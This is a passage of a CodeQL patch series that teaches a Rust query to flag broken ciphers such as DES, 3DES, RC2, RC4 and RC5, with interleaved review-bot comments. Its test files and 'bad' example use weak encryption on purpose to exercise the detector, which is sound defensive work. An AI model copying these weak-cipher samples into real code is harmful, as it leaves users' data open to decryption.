
| The cryptographic algorithm RC2 | +| test_cipher.rs:110:23:110:50 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:110:23:110:50 | ...::new(...) | The cryptographic algorithm RC5 | +| test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | The cryptographic algorithm RC5 | diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index a0230881044..bcb78b32db4 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs @@ -17,16 +17,16 @@ fn test_stream_cipher( // rc4 (broken) let rc4_key = rc4::Key::::from_slice(key128); - let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] rc4_cipher1.apply_keystream(&mut data); - let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] rc4_cipher2.apply_keystream(&mut data); - let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] let _ = rc4_cipher3.try_apply_keystream(&mut data); - let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] let _ = rc4_cipher4.apply_keystream_b2b(plaintext.as_bytes(), &mut data); // rabbit 
@@ -56,23 +56,23 @@ fn test_block_cipher( aes_cipher3.decrypt_block(block128.into()); // des (broken) - let des_cipher1 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher1 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher1.encrypt_block(data.into()); des_cipher1.decrypt_block(data.into()); - let des_cipher2 = des::Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher2 = des::Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher2.encrypt_block(data.into()); des_cipher2.decrypt_block(data.into()); - let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher3.encrypt_block(data.into()); des_cipher3.decrypt_block(data.into()); - let des_cipher4 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher4 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher4.encrypt_block_b2b(input.into(), data.into()); des_cipher4.decrypt_block_b2b(input.into(), data.into()); - let mut des_cipher5 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut des_cipher5 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher5.encrypt_block_mut(data.into()); des_cipher5.decrypt_block_mut(data.into()); 
@@ -94,11 +94,11 @@ fn test_block_cipher( tdes_cipher4.decrypt_block(data.into()); // rc2 (broken) - let rc2_cipher1 = Rc2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher1 = Rc2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher1.encrypt_block(data.into()); rc2_cipher1.decrypt_block(data.into()); - let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher2.encrypt_block(data.into()); rc2_cipher2.decrypt_block(data.into()); @@ -107,11 +107,11 @@ fn test_block_cipher( rc2_cipher3.decrypt_block(data.into()); // rc5 (broken) - let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] rc5_cipher1.encrypt_block(data.into()); rc5_cipher1.decrypt_block(data.into()); - let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] rc5_cipher2.encrypt_block(data.into()); rc5_cipher2.decrypt_block(data.into()); } From 6eb850c8cb5cadbd6ee66b0ceef9e13574957dcd Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 16:49:10 +0000 Subject: [PATCH 0854/1267] Rust: Improve the model. --- .../lib/codeql/rust/frameworks/RustCrypto.qll | 18 ++++++++++++++---- .../CWE-327/BrokenCryptoAlgorithm.expected | 8 ++++++++ .../security/CWE-327/test_cipher.rs | 16 ++++++++-------- 3 files changed, 30 insertions(+), 12 deletions(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index 295ce8d9e63..e2142cfe0d9 100644 
--- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -6,6 +6,12 @@ private import rust private import codeql.rust.Concepts private import codeql.rust.dataflow.DataFlow +bindingset[algorithmName] +string simplifyAlgorithmName(string algorithmName) { + // the cipher library gives triple-DES names like "TdesEee2" and "TdesEde2" + if algorithmName.matches("Tdes%") then result = "3des" else result = algorithmName +} + /** * An operation that initializes a cipher through the `cipher::KeyInit` or * `cipher::KeyIvInit` trait, for example `Des::new` or `cbc::Encryptor::new`. @@ -15,13 +21,17 @@ class StreamCipherInit extends Cryptography::CryptographicOperation::Range, Data StreamCipherInit() { // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`, - // `cipher::KeyIvInit::new` or `cipher::KeyIvInit::new_from_slices`. - exists(Path p | + // `cipher::KeyIvInit::new`, `cipher::KeyIvInit::new_from_slices` or `rc2::Rc2::new_with_eff_key_len`. + exists(Path p, string rawAlgorithmName | this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and p.getResolvedCrateOrigin().matches("%/RustCrypto%") and p.getPart().getNameRef().getText() = - ["new", "new_from_slice", "new_from_slices"] and - algorithmName = p.getQualifier().getPart().getNameRef().getText() + ["new", "new_from_slice", "new_from_slices", "new_with_eff_key_len"] and + ( + rawAlgorithmName = p.getQualifier().getPart().getNameRef().getText() or + rawAlgorithmName = p.getQualifier().getPart().getGenericArgList().getGenericArg(0).(TypeArg).getTy().(PathType).getPath().getPart().getNameRef().getText() + ) and + algorithmName = simplifyAlgorithmName(rawAlgorithmName) ) } diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected index 69f0fed8534..f1395ff39ec 100644 
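Review bot: `simplifyAlgorithmName`, added in the `@@ -6,6 +6,12 @@` hunk, is declared without `private` and without QLDoc, so it becomes an exported, undocumented predicate of `RustCrypto.qll` although only the cipher model in the same file appears to use it. I would declare it as `private string simplifyAlgorithmName(string algorithmName) {` and give it a comment such as `/** Gets `algorithmName` with the triple-DES type names of the cipher crates (`TdesEee2`, `TdesEde2`, ...) mapped to `3des`. */`. The mapping is by prefix (`matches("Tdes%")`), which is worth stating in that comment because any other type whose name begins with `Tdes` would be reported as 3DES as well.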
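Review bot: In the `@@ -15,13 +21,17 @@` hunk, the second disjunct inspects only `getGenericArg(0)` of the qualifier, and it is written as one very long call chain that does not look auto-formatted. With the `or`, a call such as `cbc::Encryptor::<des::Des>::new` yields two candidate names, the wrapper and the cipher, and the model relies on the wrapper name matching no known algorithm; a short comment saying so would help the next reader, e.g. `// for wrappers such as cbc::Encryptor<Des>, the cipher is the first generic argument`. If a wrapper can take the cipher in another generic position, that case is missed, which I cannot confirm from the tests shown here. Binding the intermediate path to a variable inside the `exists` would also bring the line back under the formatter's width.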
--- a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected +++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected 
@@ -7,7 +7,15 @@ | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | The cryptographic algorithm DES | | test_cipher.rs:71:23:71:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:71:23:71:42 | ...::new(...) | The cryptographic algorithm DES | | test_cipher.rs:75:27:75:46 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:75:27:75:46 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:80:24:80:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:80:24:80:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:84:24:84:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:84:24:84:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:88:24:88:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:88:24:88:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:92:24:92:52 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:92:24:92:52 | ...::new_from_slice(...) | The cryptographic algorithm 3DES | | test_cipher.rs:97:23:97:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:97:23:97:42 | ...::new(...) | The cryptographic algorithm RC2 | | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | The cryptographic algorithm RC2 | +| test_cipher.rs:105:23:105:56 | ...::new_with_eff_key_len(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:105:23:105:56 | ...::new_with_eff_key_len(...) | The cryptographic algorithm RC2 | | test_cipher.rs:110:23:110:50 | ...::new(...) | $@ is broken or weak, and should not be used. 
| test_cipher.rs:110:23:110:50 | ...::new(...) | The cryptographic algorithm RC5 | | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | The cryptographic algorithm RC5 | +| test_cipher.rs:132:23:132:76 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:132:23:132:76 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:138:23:138:76 | ...::new_from_slices(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:138:23:138:76 | ...::new_from_slices(...) | The cryptographic algorithm DES | +| test_cipher.rs:141:23:141:76 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:141:23:141:76 | ...::new(...) | The cryptographic algorithm DES | diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index bcb78b32db4..0cf20c4c278 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs 
@@ -77,19 +77,19 @@ fn test_block_cipher( des_cipher5.decrypt_block_mut(data.into()); // triple des (broken) - let tdes_cipher1 = TdesEde2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher1 = TdesEde2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher1.encrypt_block(data.into()); tdes_cipher1.decrypt_block(data.into()); - let tdes_cipher2 = TdesEde3::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher2 = TdesEde3::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher2.encrypt_block(data.into()); tdes_cipher2.decrypt_block(data.into()); - let tdes_cipher3 = TdesEee2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher3 = TdesEee2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher3.encrypt_block(data.into()); tdes_cipher3.decrypt_block(data.into()); - let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher4.encrypt_block(data.into()); tdes_cipher4.decrypt_block(data.into()); @@ -102,7 +102,7 @@ fn test_block_cipher( rc2_cipher2.encrypt_block(data.into()); rc2_cipher2.decrypt_block(data.into()); - let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher3.encrypt_block(data.into()); rc2_cipher3.decrypt_block(data.into()); 
@@ -129,15 +129,15 @@ fn test_cbc( _ = aes_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); // des (broken) - let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); let des_cipher2 = MyDesEncryptor::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] _ = des_cipher2.encrypt_padded_mut::(data, data_len).unwrap(); - let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher3.encrypt_padded_mut::(data, data_len).unwrap(); - let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher4.encrypt_padded_b2b_mut::(input, data).unwrap(); } From dd0fa791aa49bffe3fae5b57f92683396dbd916a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 17:28:45 +0000 Subject: [PATCH 0855/1267] Rust: Add qhelp. --- .../CWE-327/BrokenCryptoAlgorithm.qhelp | 62 +++++++++++++++++++ .../CWE-327/BrokenCryptoAlgorithmBad.rs | 2 + .../CWE-327/BrokenCryptoAlgorithmGood.rs | 2 + 3 files changed, 66 insertions(+) create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs 
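Review bot: The `des_cipher2 = MyDesEncryptor::new(...)` line keeps its `MISSING` marker with no explanation, so a DES cipher constructed through what looks like a type alias is still not reported after this change. Presumably this is because the library reads the algorithm from the path text and does not resolve the alias; that is inferred, since the alias definition is outside the hunk. A short comment on that line would make the remaining false negative explicit for the next reader, for example `// not detected: the cipher type is hidden behind a type alias`. The body of `test_cbc` starts outside the hunk.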
diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp new file mode 100644 index 00000000000..f93c77e83f2 --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp @@ -0,0 +1,62 @@ + + + +

+ Using broken or weak cryptographic algorithms can leave data + vulnerable to being decrypted or forged by an attacker. +

+ +

+ Many cryptographic algorithms provided by cryptography + libraries are known to be weak, or flawed. Using such an + algorithm means that encrypted or hashed data is less + secure than it appears to be. +

+ +

+ This query alerts on any use of a weak cryptographic algorithm, that is + not a hashing algorithm. Use of broken or weak cryptographic hash + functions are handled by the + rust/weak-sensitive-data-hashing query. +

+ +
+ + +

+ Ensure that you use a strong, modern cryptographic + algorithm, such as AES-128 or RSA-2048. +

+ +
+ + +

+ The following code uses the des crate from the + RustCrypto family to encrypt some secret data. The + DES algorithm is old and considered very weak. +

+ + + +

+ Instead we should use a strong modern algorithm. In this + case we have selected the 256-bit version of the AES + algorithm. +

+ + + +
+ + +
  • NIST, FIPS 140 Annex a: Approved Security Functions.
  • +
  • NIST, SP 800-131A: Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths.
  • +
  • OWASP: Cryptographic Storage Cheat Sheet - Algorithms. +
  • +
    + +
    diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs new file mode 100644 index 00000000000..3e86462c62a --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs @@ -0,0 +1,2 @@ +let des_cipher = cbc::Encryptor::::new(key.into(), iv.into()); // BAD: weak encryption +let encryption_result = des_cipher.encrypt_padded_mut::(data, data_len); diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs new file mode 100644 index 00000000000..6cafbc69bf7 --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs @@ -0,0 +1,2 @@ +let aes_cipher = cbc::Encryptor::::new(key.into(), iv.into()); // GOOD: strong encryption +let encryption_result = aes_cipher.encrypt_padded_mut::(data, data_len); From 4e418d3d4da22e3f093069869fdc3c302de23d1a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 18:54:15 +0000 Subject: [PATCH 0856/1267] Rust: Update for latest main, and autoformat. --- .../lib/codeql/rust/frameworks/RustCrypto.qll | 22 ++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index e2142cfe0d9..1037c95b436 100644 --- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll 
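Review bot: In BrokenCryptoAlgorithmGood.rs the recommended replacement still builds a `cbc::Encryptor`, and CBC on its own gives confidentiality without integrity, so a reader who copies the "GOOD" snippet swaps a weak cipher for a strong one but keeps unauthenticated encryption. The type argument is not visible in this rendering; the qhelp text says it is 256-bit AES. I would keep the example focused on the algorithm choice but say so in the comment, e.g. `// GOOD: strong cipher (AES-256); authenticate the ciphertext with a MAC or prefer an AEAD mode`. The recommendation paragraph in the qhelp could carry the same caveat next to "AES-128 or RSA-2048".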
@@ -22,14 +22,26 @@ class StreamCipherInit extends Cryptography::CryptographicOperation::Range, Data StreamCipherInit() { // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`, // `cipher::KeyIvInit::new`, `cipher::KeyIvInit::new_from_slices` or `rc2::Rc2::new_with_eff_key_len`. - exists(Path p, string rawAlgorithmName | - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and + exists(PathExpr p, string rawAlgorithmName | + this.asExpr().getExpr().(CallExpr).getFunction() = p and p.getResolvedCrateOrigin().matches("%/RustCrypto%") and - p.getPart().getNameRef().getText() = + p.getPath().getPart().getNameRef().getText() = ["new", "new_from_slice", "new_from_slices", "new_with_eff_key_len"] and ( - rawAlgorithmName = p.getQualifier().getPart().getNameRef().getText() or - rawAlgorithmName = p.getQualifier().getPart().getGenericArgList().getGenericArg(0).(TypeArg).getTy().(PathType).getPath().getPart().getNameRef().getText() + rawAlgorithmName = p.getPath().getQualifier().getPart().getNameRef().getText() or + rawAlgorithmName = + p.getPath() + .getQualifier() + .getPart() + .getGenericArgList() + .getGenericArg(0) + .(TypeArg) + .getTypeRepr() + .(PathTypeRepr) + .getPath() + .getPart() + .getNameRef() + .getText() ) and algorithmName = simplifyAlgorithmName(rawAlgorithmName) ) From b59b90ba6df8950d224856905eb8efd82b6807b7 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Fri, 6 Dec 2024 09:12:16 +0100 Subject: [PATCH 0857/1267] Rust: accept test changes --- .../canonical_path/canonical_paths.expected | 18 ++++++++--------- .../CONSISTENCY/AstConsistency.expected | 2 +- .../MethodCallExpr/MethodCallExpr.expected | 4 ++-- .../MethodCallExpr_getArgList.expected | 4 ++-- .../MethodCallExpr_getGenericArgList.expected | 2 +- .../MethodCallExpr_getNameRef.expected | 4 ++-- .../MethodCallExpr_getReceiver.expected | 4 ++-- .../ql/test/extractor-tests/utf8/ast.expected | 2 +- .../library-tests/controlflow/Cfg.expected | 12 +++++------ .../dataflow/global/inline-flow.expected | 14 ++++++------- .../dataflow/global/viableCallable.expected | 6 +++--- .../dataflow/local/inline-flow.expected | 6 +++--- .../test/library-tests/variables/Cfg.expected | 20 +++++++++---------- 13 files changed, 49 insertions(+), 49 deletions(-) diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 09583dcf9f6..4f0f2ec96fb 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected @@ -1,7 +1,7 @@ canonicalPaths | anonymous.rs:1:1:1:26 | Use | None | None | | anonymous.rs:3:1:32:1 | fn canonicals | repo::test | crate::anonymous::canonicals | -| anonymous.rs:4:5:4:23 | Struct | repo::test | {0}::OtherStruct | +| anonymous.rs:4:5:4:23 | struct OtherStruct | repo::test | {0}::OtherStruct | | anonymous.rs:6:5:8:5 | trait OtherTrait | repo::test | {0}::OtherTrait | | anonymous.rs:7:9:7:20 | fn g | repo::test | {0}::OtherTrait::g | | anonymous.rs:10:5:12:5 | impl OtherTrait for OtherStruct { ... } | None | None | 
@@ -11,13 +11,13 @@ canonicalPaths | anonymous.rs:18:5:20:5 | impl ...::Trait for OtherStruct { ... } | None | None | | anonymous.rs:19:9:19:22 | fn f | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:22:5:24:5 | fn nested | repo::test | {0}::nested | -| anonymous.rs:23:9:23:27 | Struct | repo::test | {1}::OtherStruct | +| anonymous.rs:23:9:23:27 | struct OtherStruct | repo::test | {1}::OtherStruct | | anonymous.rs:26:5:31:5 | fn usage | repo::test | {0}::usage | | anonymous.rs:34:1:36:1 | fn other | repo::test | crate::anonymous::other | -| anonymous.rs:35:5:35:23 | Struct | repo::test | {36}::OtherStruct | +| anonymous.rs:35:5:35:23 | struct OtherStruct | repo::test | {36}::OtherStruct | | lib.rs:1:1:1:14 | mod anonymous | repo::test | crate::anonymous | | lib.rs:2:1:2:12 | mod regular | repo::test | crate::regular | -| regular.rs:1:1:2:18 | Struct | repo::test | crate::regular::Struct | +| regular.rs:1:1:2:18 | struct Struct | repo::test | crate::regular::Struct | | regular.rs:4:1:6:1 | trait Trait | repo::test | crate::regular::Trait | | regular.rs:5:5:5:16 | fn f | repo::test | crate::regular::Trait::f | | regular.rs:8:1:10:1 | impl Trait for Struct { ... } | None | None | 
@@ -38,17 +38,17 @@ canonicalPaths resolvedPaths | anonymous.rs:27:17:27:30 | OtherStruct {...} | repo::test | {0}::OtherStruct | | anonymous.rs:28:9:28:9 | s | None | None | -| anonymous.rs:28:9:28:13 | ... .f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | +| anonymous.rs:28:9:28:13 | s.f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:29:9:29:9 | s | None | None | -| anonymous.rs:29:9:29:13 | ... .g(...) | repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | +| anonymous.rs:29:9:29:13 | s.g(...) | repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | | anonymous.rs:30:9:30:14 | nested | repo::test | {0}::nested | | regular.rs:27:13:27:21 | Struct {...} | repo::test | crate::regular::Struct | | regular.rs:28:5:28:5 | s | None | None | -| regular.rs:28:5:28:9 | ... .f(...) | repo::test | ::f | +| regular.rs:28:5:28:9 | s.f(...) | repo::test | ::f | | regular.rs:29:5:29:5 | s | None | None | -| regular.rs:29:5:29:9 | ... .g(...) | repo::test | ::g | +| regular.rs:29:5:29:9 | s.g(...) | repo::test | ::g | | regular.rs:30:5:30:5 | s | None | None | -| regular.rs:30:5:30:9 | ... .h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | +| regular.rs:30:5:30:9 | s.h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | | regular.rs:31:5:31:8 | free | repo::test | crate::regular::free | | regular.rs:41:9:41:26 | ...::None::<...> | lang:core | crate::option::Option::None | | regular.rs:42:9:42:20 | ...::Some | lang:core | crate::option::Option::Some | diff --git a/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected b/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected index d977579474b..cff0de0b5af 100644 --- a/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected +++ b/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected 
@@ -1,5 +1,4 @@ noLocation -| file://:0:0:0:0 | ... .parent(...) | | file://:0:0:0:0 | ... .unwrap(...) | | file://:0:0:0:0 | ...: ... | | file://:0:0:0:0 | ...::Path | @@ -35,6 +34,7 @@ noLocation | file://:0:0:0:0 | path | | file://:0:0:0:0 | path | | file://:0:0:0:0 | path | +| file://:0:0:0:0 | path.parent(...) | | file://:0:0:0:0 | std | | file://:0:0:0:0 | std | | file://:0:0:0:0 | std | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected index d6c0d90cd75..2922152a234 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | no | hasNameRef: | yes | hasReceiver: | yes | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | yes | hasNameRef: | yes | hasReceiver: | yes | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | no | hasNameRef: | yes | hasReceiver: | yes | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | yes | hasNameRef: | yes | hasReceiver: | yes | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected index e6fad5c36ec..c9d10231cd9 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected 
+++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:10:5:13 | ArgList | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:22:6:25 | ArgList | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:10:5:13 | ArgList | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:22:6:25 | ArgList | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected index dd1ed8c0304..51e1108ebb2 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected @@ -1 +1 @@ -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:10:6:21 | <...> | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:10:6:21 | <...> | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected 